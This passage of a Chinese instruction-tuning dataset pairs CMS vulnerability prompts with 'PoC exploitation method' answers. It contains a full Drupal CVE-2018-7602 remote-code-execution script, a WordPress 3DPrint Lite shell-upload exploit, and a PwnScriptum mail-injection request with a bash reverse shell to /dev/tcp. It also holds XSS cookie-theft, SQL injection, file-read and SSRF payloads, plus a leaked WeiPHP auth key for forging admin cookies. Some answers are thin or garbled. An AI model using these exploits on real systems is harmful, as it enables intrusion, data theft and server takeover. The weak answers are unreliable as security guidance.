$msg = \"<script>alert(\\\"\" . str_replace(\"\\\"\", \"“\", $msg) . \"\\\");</script>\";\n    } else {\n        //当网址为:close::objname 时, 关闭父框架的id=objname元素\n        if (preg_match('/close::/', $gourl)) {\n            $tgobj = trim(preg_replace('/close::/', '', $gourl));\n            $gourl = 'javascript:;';\n            $func .= \"window.parent.document.getElementById('{$tgobj}').style.display='none';\\r\\n\";\n        }\n\n        $func .= \"var pgo=0;\n      function JumpUrl(){\n        if(pgo==0){ location='$gourl'; pgo=1; }\n      }\\r\\n\";\n        $rmsg = $func;\n        $rmsg .= \"document.write(\\\"<div style='height:130px;font-size:10pt;background:#ffffff'><br />\\\");\\r\\n\";\n        $rmsg .= \"document.write(\\\"\" . str_replace(\"\\\"\", \"“\", $msg) . \"\\\");\\r\\n\";\n        $rmsg .= \"document.write(\\\"\";\n\n        if ($onlymsg == 0) {\n            if ($gourl != 'javascript:;' && $gourl != '') {\n                $rmsg .= \"<br /><a href='{$gourl}'>如果你的浏览器没反应,请点击这里...</a>\";\n                $rmsg .= \"<br/></div>\\\");\\r\\n\";\n                $rmsg .= \"setTimeout('JumpUrl()',$litime);\";\n            } else {\n                $rmsg .= \"<br/></div>\\\");\\r\\n\";\n            }\n        } else {\n            $rmsg .= \"<br/><br/></div>\\\");\\r\\n\";\n        }\n        $msg = $htmlhead . $rmsg . $htmlfoot;\n    }\n    \n    $tpl = new DedeTemplate();\n    $tpl->LoadString($msg);\n    $tpl->Display();\n}\n\n/**\n *  获取验证码的session值\n *\n * @return string\n */\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/DedeCMS common.func.php 远程命令执行漏洞.md"}
    42. 

  42. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:CmsEasy crossall_act.php SQL注入漏洞\n漏洞描述:CmsEasy 存在SQL注入漏洞,通过文件 service.php 加密SQL语句执行即可执行任意SQL命令\n影响版本:``` CmsEasy V7.7.5_20210919 ```\n网络测绘:``` body=\"cmseasyedit\" ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. CmsEasy V7.7.5_20210919\n2. body=\"cmseasyedit\"\n3. function execsql_action(){\n        $sqlquery=front::get(\"sql\");\n        $sqlquery=service::getInstance()->unlockString($sqlquery,\"cmseasy_sql\");\n\n        $returndata=tdatabase::getInstance()->rec_query_one($sqlquery);\n        echo json_encode($returndata);\n        exit;\n    }\n    function execsqls_action(){\n            $sqlquery=front::get(\"sql\");\n            $sqlquery=service::getInstance()->unlockString($sqlquery,\"cmseasy_sql\");\n\n            $returndata=tdatabase::getInstance()->rec_query($sqlquery);\n            echo json_encode($returndata);\n            exit;\n        }\n    function execupdate_action(){\n        $sqlquery=front::get(\"sql\");\n        $sqlquery=service::getInstance()->unlockString($sqlquery,\"cmseasy_sql\");\n\n        $returndata=tdatabase::getInstance()->query($sqlquery);\n        echo json_encode($returndata);\n        exit;\n    }\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/CmsEasy crossall_act.php SQL注入漏洞.md"}
    43. 

  43. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:快排CMS 后台任意文件上传漏洞\n漏洞描述:快排CMS 后台管理模块存在任意文件上传漏洞,攻击者通过漏洞可以控制服务器\n影响版本:``` 快排 CMS <= 1.2 ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. 快排 CMS <= 1.2\n2. http://xxx.xxx.xxx.xxx/admin.php/index/login.html\n3. thinkphp/library/think/File.php\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/快排CMS 后台任意文件上传漏洞.md"}
    44. 

  44. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Drupal 远程代码执行漏洞 CVE-2018-7602\n漏洞描述:影响软件:drupal 方式:对URL中的#进行编码两次,绕过sanitize()函数过滤 效果:任意命令执行\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【CVE编号】CVE-2018-7602\n【POC利用方法】\n1. docker-compose up -d\n2. # \"id\"为要执行的命令 第一个drupal为用户名 第二个drupal为密码\npython3 drupa7-CVE-2018-7602.py -c \"id\" drupal drupal http://127.0.0.1:8081/\n3. #!/usr/bin/env python3\n\nimport requests\nimport argparse\nfrom bs4 import BeautifulSoup\n\ndef get_args():\n  parser = argparse.ArgumentParser( prog=\"drupa7-CVE-2018-7602.py\",\n                    formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=50),\n                    epilog= '''\n                    This script will exploit the (CVE-2018-7602) vulnerability in Drupal 7 <= 7.58\n                    using an valid account and poisoning the cancel account form (user_cancel_confirm_form) \n                    with the 'destination' variable and triggering it with the upload file via ajax (/file/ajax).\n                    ''')\n\n  parser.add_argument(\"user\", help=\"Username\")\n  parser.add_argument(\"password\", help=\"Password\")\n  parser.add_argument(\"target\", help=\"URL of target Drupal site (ex: http://target.com/)\")\n  parser.add_argument(\"-c\", \"--command\", default=\"id\", help=\"Command to execute (default = id)\")\n  parser.add_argument(\"-f\", \"--function\", default=\"passthru\", help=\"Function to use as attack vector (default = passthru)\")\n  parser.add_argument(\"-x\", \"--proxy\", default=\"\", help=\"Configure a proxy in the format http://127.0.0.1:8080/ (default = none)\")\n  args = parser.parse_args()\n  return args\n\ndef pwn_target(target, username, password, function, command, proxy):\n  requests.packages.urllib3.disable_warnings()\n  session = requests.Session()\n  proxyConf = {'http': proxy, 'https': proxy}\n  try:\n    print('[*] Creating a session using the provided credential...')\n    get_params = {'q':'user/login'}\n    post_params = {'form_id':'user_login', 'name': username, 'pass' : password, 'op':'Log in'}\n    print('[*] Finding User ID...')\n    session.post(target, params=get_params, data=post_params, verify=False, proxies=proxyConf)\n    get_params = {'q':'user'}\n    r = session.get(target, params=get_params, verify=False, proxies=proxyConf)\n    soup = BeautifulSoup(r.text, \"html.parser\")\n    user_id = soup.find('meta', {'property': 'foaf:name'}).get('about')\n    if (\"?q=\" in user_id):\n      user_id = user_id.split(\"=\")[1]\n    if(user_id):\n      print('[*] User ID found: ' + user_id)\n    print('[*] Poisoning a form using \\'destination\\' and including it in cache.')\n    get_params = {'q': user_id + '/cancel'}\n    r = session.get(target, params=get_params, verify=False, proxies=proxyConf)\n    soup = BeautifulSoup(r.text, \"html.parser\")\n    form = soup.find('form', {'id': 'user-cancel-confirm-form'})\n    form_token = form.find('input', {'name': 'form_token'}).get('value')\n    get_params = {'q': user_id + '/cancel', 'destination' : user_id +'/cancel?q[%23post_render][]=' + function + '&q[%23type]=markup&q[%23markup]=' + command }\n    post_params = {'form_id':'user_cancel_confirm_form','form_token': form_token, '_triggering_element_name':'form_id', 'op':'Cancel account'}\n    r = session.post(target, params=get_params, data=post_params, verify=False, proxies=proxyConf)\n    soup = BeautifulSoup(r.text, \"html.parser\")\n    form = soup.find('form', {'id': 'user-cancel-confirm-form'})\n    form_build_id = form.find('input', {'name': 'form_build_id'}).get('value')\n    if form_build_id:\n        print('[*] Poisoned form ID: ' + form_build_id)\n        print('[*] Triggering exploit to execute: ' + command)\n        get_params = {'q':'file/ajax/actions/cancel/#options/path/' + form_build_id}\n        post_params = {'form_build_id':form_build_id}\n        r = session.post(target, params=get_params, data=post_params, verify=False, proxies=proxyConf)\n        parsed_result = r.text.split('[{\"command\":\"settings\"')[0]\n        print(parsed_result)\n  except:\n    print(\"ERROR: Something went wrong.\")\n    raise\n\ndef main():\n  print ()\n  print ('===================================================================================')\n  print ('|   DRUPAL 7 <= 7.58 REMOTE CODE EXECUTION (SA-CORE-2018-004 / CVE-2018-7602)     |')\n  print ('|                                   by pimps                                      |')\n  print ('===================================================================================\\n')\n\n  args = get_args() # get the cl args\n  pwn_target(args.target.strip(),args.user.strip(),args.password.strip(), args.function.strip(), args.command.strip(), args.proxy.strip())\n\n\nif __name__ == '__main__':\n  main()\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/Drupal 远程代码执行漏洞 CVE-2018-7602.md"}
    45. 

  45. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:74cms v4.2.1 v4.2.129 后台getshell漏洞\n漏洞描述:厂商:74cms 下载地址:http://www.74cms.com/download/index.html 关于版本: 新版的74cms采用了tp3.2.3重构了,所以可知底层是tp,74cms新版升级是后台升级的,所以先将将升级方法。 注:此漏洞不用升级至最新版本也可使用。\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. http://74cms.test/index.php?m=Admin&c=Tpl&a=set&tpl_dir= ', 'a',phpinfo(),'\n2. http://74cms.test/Application/Home/Conf/config.php\n3. \\74cms\\upload\\Application\\Home\\Conf\\config.php\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/74cms v4.2.1 v4.2.129 后台getshell漏洞.md"}
    46. 

  46. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:极致CMS 1.81 后台存储型XSS\n漏洞描述:极致CMS后台中存在存储XSS,通过XSS漏洞,可能泄漏敏感信息\n影响版本:``` 极致CMS ```\n网络测绘:``` icon_hash=\"1657387632\" ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. icon_hash=\"1657387632\"\n2. 在文章标题处插入xss payload\n3. - `<details open ontoggle= confirm(document[`coo`+`kie`])>`\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/极致CMS 1.81 后台存储型XSS.md"}
    47. 

  47. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:WordPress 3DPrint Lite 3dprint-lite-functions.php 任意文件上传漏洞\n漏洞描述:WordPress 3DPrint Lite Version 1.9.1.4 版本 中的 3dprint-lite-functions.php 文件存在文件上传漏洞,攻击者通过构造请求包可以上传任意文件获取服务器权限\n影响版本:``` 3DPrint Lite Version 1.9.1.4 版本 ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. 3DPrint Lite Version 1.9.1.4 版本\n2. if ( is_admin() ) {\n\tadd_action( 'admin_enqueue_scripts', 'p3dlite_enqueue_scripts_backend' );\n\tadd_action( 'wp_ajax_p3dlite_handle_upload', 'p3dlite_handle_upload' );\n\tadd_action( 'wp_ajax_nopriv_p3dlite_handle_upload', 'p3dlite_handle_upload' );\n\tinclude 'includes/3dprint-lite-admin.php';\n}\nelse {\n\tadd_action( 'wp_enqueue_scripts', 'p3dlite_enqueue_scripts_frontend' );\n\tinclude 'includes/3dprint-lite-frontend.php';\n}\n3. # Exploit Title: Wordpress Plugin 3DPrint Lite 1.9.1.4 - Arbitrary File Upload\n# Google Dork: inurl:/wp-content/plugins/3dprint-lite/\n# Date: 22/09/2021\n# Exploit Author: spacehen\n# Vendor Homepage: https://wordpress.org/plugins/3dprint-lite/\n# Version: <= 1.9.1.4\n# Tested on: Ubuntu 20.04.1\n\nimport os.path\nfrom os import path\nimport json\nimport requests;\nimport sys\n\ndef print_banner():\n\tprint(\"3DPrint Lite <= 1.9.1.4 - Arbitrary File Upload\")\n\tprint(\"Author -> spacehen (www.github.com/spacehen)\")\n\ndef print_usage():\n\tprint(\"Usage: python3 exploit.py [target url] [php file]\")\n\tprint(\"Ex: python3 exploit.py https://example.com ./shell.php\")\n\ndef vuln_check(uri):\n\tresponse = requests.get(uri)\n\traw = response.text\n\tif (\"jsonrpc\" in raw):\n\t\treturn True;\n\telse:\n\t\treturn False;\n\ndef main():\n\n\tprint_banner()\n\tif(len(sys.argv) != 3):\n\t\tprint_usage();\n\t\tsys.exit(1);\n\n\tbase = sys.argv[1]\n\tfile_path = sys.argv[2]\n\n\tajax_action = 'p3dlite_handle_upload'\n\tadmin = '/wp-admin/admin-ajax.php';\n\n\turi = base + admin + '?action=' + ajax_action ;\n\tcheck = vuln_check(uri);\n\n\tif(check == False):\n\t\tprint(\"(*) Target not vulnerable!\");\n\t\tsys.exit(1)\n\n\tif( path.isfile(file_path) == False):\n\t\tprint(\"(*) Invalid file!\")\n\t\tsys.exit(1)\n\n\tfiles = {'file' : open(file_path)}\n\tprint(\"Uploading Shell...\");\n\tresponse = requests.post(uri, files=files)\n\tfile_name = path.basename(file_path)\n\tif(file_name in response.text):\n\t\tprint(\"Shell Uploaded!\")\n\t\tif(base[-1] != '/'):\n\t\t\tbase += '/'\n\t\tprint(base + \"wp-content/uploads/p3d/\" + file_name);\n\telse:\n\t\tprint(\"Shell Upload Failed\")\n\t\tsys.exit(1)\n\nmain();\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/WordPress 3DPrint Lite 3dprint-lite-functions.php 任意文件上传漏洞.md"}
    48. 

  48. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Drupal 远程代码执行漏洞 CVE-2019-6339\n漏洞描述:影响软件:Drupal 方式:phar反序列化RCE 参考链接:[Drupal 1-click to RCE 分析](https://paper.seebug.org/897/) 效果:任意命令执行\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【CVE编号】CVE-2019-6339\n【POC利用方法】\n1. docker-compose up -d\n2. 环境启动后,访问 `http://your-ip:8080/` 将会看到drupal的安装页面,一路默认配置下一步安装。因为没有mysql环境,所以安装的时候可以选择sqlite数据库。\n3. 参考链接:[Drupal 1-click to RCE 分析](https://paper.seebug.org/897/)\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/Drupal 远程代码执行漏洞 CVE-2019-6339.md"}
    49. 

  49. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:DedeCMS 5.7 file_manage_control.php 文件包含 RCE CVE-2023-2928\n漏洞描述:版本 5.7.106 之前的 DedeCMS 中存在漏洞,`/dede/article_allowurl_edit.php` 缺少对该文件中写入内容的过滤,结合 `/dede/file_manage_control.php` 文件构造文件包含代码,将构成远程代码执行。\n影响版本:``` DedeCMS < 5.7.106 ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【CVE编号】CVE-2023-2928\n【POC利用方法】\n1. DedeCMS < 5.7.106\n2. www.dedecms.com\nwww.desdev.cn\nbbs.dedecms.com\n<?php phpinfo();?>\n3. # Payload\nfmdo=edit&backurl=&token=&activepath=&filename=shell.php&str=<?php include_once(\"./data/admin/allowurl.txt\");?>\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/DedeCMS 5.7 file_manage_control.php 文件包含 RCE CVE-2023-2928.md"}
    50. 

  50. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Joomla application 权限绕过漏洞 CVE-2023-23752\n漏洞描述:Joomla是一个开源免费的内容管理系统(CMS),基于PHP开发。 在其4.0.0版本到4.2.7版本中,存在一处属性覆盖漏洞,导致攻击者可以通过恶意请求绕过权限检查,访问任意Rest API。 参考链接: - https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.html - https://xz.aliyun.com/t/12175 - https://vulncheck.com/blog/joomla-for-rce\n影响版本:``` Joomla 4.0.0 - 4.2.7 ```\n网络测绘:``` app=\"Joomla\" ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【CVE编号】CVE-2023-23752\n【POC利用方法】\n1. Joomla 4.0.0 - 4.2.7\n2. app=\"Joomla\"\n3. docker-compose up -d\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/Joomla application 权限绕过漏洞 CVE-2023-23752.md"}
    51. 

  51. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:WeiPHP5.0 任意用户Cookie伪造 CNVD-2021-09693\n漏洞描述:Weiphp5.0 存在管理员用户Cookie伪造,通过泄露的密钥数据,可利用加密方法来得到管理员的Cookie\n影响版本:``` Weiphp <= 5.0 ```\n网络测绘:app=\"WeiPHP\"\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. Weiphp <= 5.0\n2. 'data_auth_key' => '+0SeoAC#YR,Jm&c?[PhUg9u;:Drd8Fj4q|XOkx*T'\n3. function think_encrypt($data, $key = '', $expire = 0)\n{\n    $key = md5(empty($key) ? config('database.data_auth_key') : $key);\n\n    $data = base64_encode($data);\n    $x = 0;\n    $len = strlen($data);\n    $l = strlen($key);\n    $char = '';\n\n    for ($i = 0; $i < $len; $i++) {\n        if ($x == $l) {\n            $x = 0;\n        }\n\n        $char .= substr($key, $x, 1);\n        $x++;\n    }\n\n    $str = sprintf('%010d', $expire ? $expire + time() : 0);\n\n    for ($i = 0; $i < $len; $i++) {\n        $str .= chr(ord(substr($data, $i, 1)) + (ord(substr($char, $i, 1))) % 256);\n    }\n    return str_replace(array(\n        '+',\n        '/',\n        '='\n    ), array(\n        '-',\n        '_',\n        ''\n    ), base64_encode($str));\n}\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/WeiPHP5.0 任意用户Cookie伪造 CNVD-2021-09693.md"}
    52. 

  52. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:狮子鱼CMS ApigoodController.class.php SQL注入漏洞\n漏洞描述:狮子鱼CMS ApiController.class.php 参数过滤存在不严谨,导致SQL注入漏洞\n影响版本:``` 狮子鱼CMS ```\n网络测绘:``` \"/seller.php?s=/Public/login\" ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. \"/seller.php?s=/Public/login\"\n2. public function get_goods_detail() {\n        $id = I('get.id');\n        $pin_id = I('get.pin_id', 0);\n\t\t\n\t\t$token = I('get.token');\n\t\t\n\t\t$weprogram_token = M('weprogram_token')->field('member_id')->where( array('token' =>$token) )->find();\n\t\t$member_id = $weprogram_token['member_id'];\n\t\t\n\t\t\n\t\t \n\t\t\n        $need_data = array();\n        $sql = \"select g.*,gd.description,gd.is_untake_level,level_discount,gd.video_src,gd.video_size_width,gd.vedio_size_height,gd.is_video,\n            gd.summary,gd.share_title,gd.activity_summary,gd.tag from \" . C('DB_PREFIX') . \"goods g,\" . C('DB_PREFIX') . \"goods_description gd where g.goods_id=gd.goods_id and g.goods_id=\" . $id;\n        $goods = M()->query($sql);\n        $pin_model = D('Home/Pin');\n        $goods_model = D('Home/Goods');\n        $qian = array(\n            \"/Uploads/image\"\n        );\n\t\t$c_site_url = str_replace('/dan','',C('SITE_URL'));\n        $hou = array(\n            $c_site_url . \"/Uploads/image\"\n        );\n\t\t$goods[0]['video_src'] = C('SITE_URL').\"Uploads/http://peiqi-wiki-poc.oss-cn-beijing.aliyuncs.com/vuln/\".$goods[0]['video_src'];\n\t\t\n        $goods[0]['description'] = str_replace($qian, $hou, $goods[0]['description']);\n        $goods[0]['description'] = htmlspecialchars_decode($goods[0]['description']);\n        $qian = array(\n            \"\\r\\n\"\n        );\n3. https://xxx.xxx.xx.xxx/index.php?s=apigoods/get_goods_detail&id=1%20and%20updatexml(1,concat(0x7e,md5(1),0x7e),1)\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/狮子鱼CMS ApigoodController.class.php SQL注入漏洞.md"}
    53. 

  53. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Drupal Core 8 PECL YAML 反序列化任意代码执行漏洞 CVE-2017-6920\n漏洞描述:影响软件:Drupal 方式:反序列化 参考链接:[CVE-2017-6920:Drupal远程代码执行漏洞分析及POC构造](https://paper.seebug.org/334/) 效果:任意代码执行 > PECL:PHP Extension Community Library > > YAML:Yet Another Markup Language\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【CVE编号】CVE-2017-6920\n【POC利用方法】\n1. docker-compose up -d\n2. # 换镜像源,默认带vim编辑器,所以用cat换源,可以换成自己喜欢的源\ncat > sources.list << EOF\ndeb http://mirrors.163.com/debian/ jessie main non-free contrib\ndeb http://mirrors.163.com/debian/ jessie-updates main non-free contrib\ndeb http://mirrors.163.com/debian/ jessie-backports main non-free contrib\ndeb-src http://mirrors.163.com/debian/ jessie main non-free contrib\ndeb-src http://mirrors.163.com/debian/ jessie-updates main non-free contrib\ndeb-src http://mirrors.163.com/debian/ jessie-backports main non-free contrib\ndeb http://mirrors.163.com/debian-security/ jessie/updates main non-free contrib\ndeb-src http://mirrors.163.com/debian-security/ jessie/updates main non-free contrib\nEOF\n# 安装依赖\napt update\napt-get -y install gcc make autoconf libc-dev pkg-config\napt-get -y install libyaml-dev\n# 安装yaml扩展\npecl install yaml\ndocker-php-ext-enable yaml.so\n# 启用 yaml.decode_php 否则无法复现成功\necho 'yaml.decode_php = 1 = 1'>>/usr/local/etc/php/conf.d/docker-php-ext-yaml.ini\n# 退出容器\nexit\n# 重启容器,CONTAINER换成自己的容器ID\ndocker restart CONTAINER\n3. !php/object \"O:24:\\\"GuzzleHttp\\\\Psr7\\\\FnStream\\\":2:{s:33:\\\"\\0GuzzleHttp\\\\Psr7\\\\FnStream\\0methods\\\";a:1:{s:5:\\\"close\\\";s:7:\\\"phpinfo\\\";}s:9:\\\"_fn_close\\\";s:7:\\\"phpinfo\\\";}\"\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/Drupal Core 8 PECL YAML 反序列化任意代码执行漏洞 CVE-2017-6920.md"}
    54. 

  54. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Wordpress 4.6 任意命令执行漏洞 PwnScriptum\n漏洞描述:参考: - https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. docker-compose build\ndocker-compose up -d\n2. POST /wp-login.php?action=lostpassword HTTP/1.1\nHost: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}awesome_poc}} null)\nConnection: close\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\nAccept: */*\nContent-Length: 56\nContent-Type: application/x-www-form-urlencoded\n\nwp-submit=Get+New+Password&redirect_to=&user_login=admin\n3. > bash -i >& /dev/tcp/your-reverse—shell-ip/9999 0>&1\n>\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/Wordpress 4.6 任意命令执行漏洞 PwnScriptum.md"}
    55. 

  55. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:BSPHP index.php 未授权访问 信息泄露漏洞\n漏洞描述:BSPHP 存在未授权访问 泄露用户 IP 和 账户名信息\n影响版本:``` BSPHP ```\n网络测绘:``` \"BSPHP\" ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. http://xxx.xxx.xxx.xxx/admin/index.php?m=admin&c=log&a=table_json&json=get&soso_ok=1&t=user_login_log&page=1&limit=10&bsphptime=1600407394176&soso_id=1&soso=&DESC=0‘\n2. http://xxx.xxx.xxx.xxx/admin/index.php?m=admin&c=log&a=table_json&json=get&soso_ok=1&t=user_login_log&page=1&limit=10&bsphptime=1600407394176&soso_id=1&soso=&DESC=0‘\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/BSPHP index.php 未授权访问 信息泄露漏洞.md"}
    56. 

  56. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:OpenSNS CurlModel.class.php SSRF漏洞\n漏洞描述:OpenSNS CurlModel.class.php文件中curl方法存在SSRF漏洞,通过漏洞攻击者可以探测内网信息\n影响版本:``` OpenSNS ```\n网络测绘:``` icon_hash=\"1167011145\" ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. icon_hash=\"1167011145\"\n2. /?s=weibo/share/shareBox&query=app=Admin%26model=Curl%26method=curl%26id=http://92aq2z.dnslog.cn\n3. /?s=weibo/share/shareBox&query=app=Admin%26model=Curl%26method=curl%26id=http://92aq2z.dnslog.cn\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/OpenSNS CurlModel.class.php SSRF漏洞.md"}
    57. 

  57. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:禅道 11.6 api-getModel-api-getMethod-filePath 任意文件读取漏洞\n漏洞描述:禅道 11.6 版本中对用户接口调用权限过滤不完善,导致调用接口执行SQL语句导致SQL注入\n影响版本:``` 禅道 11.6 ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. docker run --name zentao_v11.6 -p 8084:80 -v /u01/zentao/www:/app/zentaopms -v /u01/zentao/data:/var/lib/mysql -e MYSQL_ROOT_PASSWORD=123456 -d docker.io/yunwisdom/zentao:v11.6\n2. public function parseCSV($fileName)\n    {\n        $content = file_get_contents($fileName);\n        /* Fix bug #890. */\n        $content = str_replace(\"\\x82\\x32\", \"\\x10\", $content);\n        $lines   = explode(\"\\n\", $content);\n\n        $col  = -1;\n        $row  = 0;\n        $data = array();\n        foreach($lines as $line)\n        {\n            $line    = trim($line);\n            $markNum = substr_count($line, '\"') - substr_count($line, '\\\"');\n            if(substr($line, -1) != ',' and (($markNum % 2 == 1 and $col != -1) or ($markNum % 2 == 0 and substr($line, -2) != ',\"' and $col == -1))) $line .= ',';\n            $line = str_replace(',\"\",', ',,', $line);\n            $line = str_replace(',\"\",', ',,', $line);\n            $line = preg_replace_callback('/(\\\"{2,})(\\,+)/U', array($this, 'removeInterference'), $line);\n            $line = str_replace('\"\"', '\"', $line);\n\n            /* if only one column then line is the data. */\n            if(strpos($line, ',') === false and $col == -1)\n            {\n                $data[$row][0] = trim($line, '\"');\n            }\n            else\n            {\n                /* if col is not -1, then the data of column is not end. */\n                if($col != -1)\n                {\n                    $pos = strpos($line, '\",');\n                    if($pos === false)\n                    {\n                        $data[$row][$col] .= \"\\n\" . $line;\n                        $data[$row][$col] = str_replace('&comma;', ',', $data[$row][$col]);\n                        continue;\n                    }\n                    else\n                    {\n                        $data[$row][$col] .= \"\\n\" . substr($line, 0, $pos);\n                        $data[$row][$col] = trim(str_replace('&comma;', ',', $data[$row][$col]));\n                        $line = substr($line, $pos + 2);\n                        $col++;\n                    }\n                }\n\n                if($col == -1) $col = 0;\n                /* explode cols with delimiter. */\n                while($line)\n                {\n                    /* the cell has '\"', the delimiter is '\",'. */\n                    if($line{0} == '\"')\n                    {\n                        $pos  = strpos($line, '\",');\n                        if($pos === false)\n                        {\n                            $data[$row][$col] = substr($line, 1);\n                            /* if line is not empty, then the data of cell is not end. */\n                            if(strlen($line) >= 1) continue 2;\n                            $line = '';\n                        }\n                        else\n                        {\n                            $data[$row][$col] = substr($line, 1, $pos - 1);\n                            $line = substr($line, $pos + 2);\n                        }\n                        $data[$row][$col] = str_replace('&comma;', ',', $data[$row][$col]);\n                    }\n                    else\n                    {\n                        /* the delimiter default is ','. */\n                        $pos = strpos($line, ',');\n                        /* if line is not delimiter, then line is the data of cell. */\n                        if($pos === false)\n                        {\n                            $data[$row][$col] = $line;\n                            $line = '';\n                        }\n                        else\n                        {\n                            $data[$row][$col] = substr($line, 0, $pos);\n                            $line = substr($line, $pos + 1);\n                        }\n                    }\n\n                    $data[$row][$col] = trim(str_replace('&comma;', ',', $data[$row][$col]));\n                    $col++;\n                }\n            }\n            $row ++;\n            $col = -1;\n        }\n\n        return $data;\n    }\n3. http://xxx.xxx.xxx.xxx/api-getModel-file-parseCSV-fileName=/etc/passwd\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/禅道 11.6 api-getModel-api-getMethod-filePath 任意文件读取漏洞.md"}
    58. 

  58. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Ke361 GoodsController.class.php SSRF漏洞\n漏洞描述:Ke361 GoodsController.class.php URL参数存在 SSRF漏洞,通过漏洞可以获取敏感信息\n影响版本:``` Ke361 ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. POST /index.php?s=/Goods/ajGetGoodsDetial\n \nurl=http://6si2gt.dnslog.cn\n2. URL参数无任何过滤,传入 file_get_contents函数,造成SSRF漏洞,构造请求\n3. https://gitee.com/jcove/ke361\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/Ke361 GoodsController.class.php SSRF漏洞.md"}
    59. 

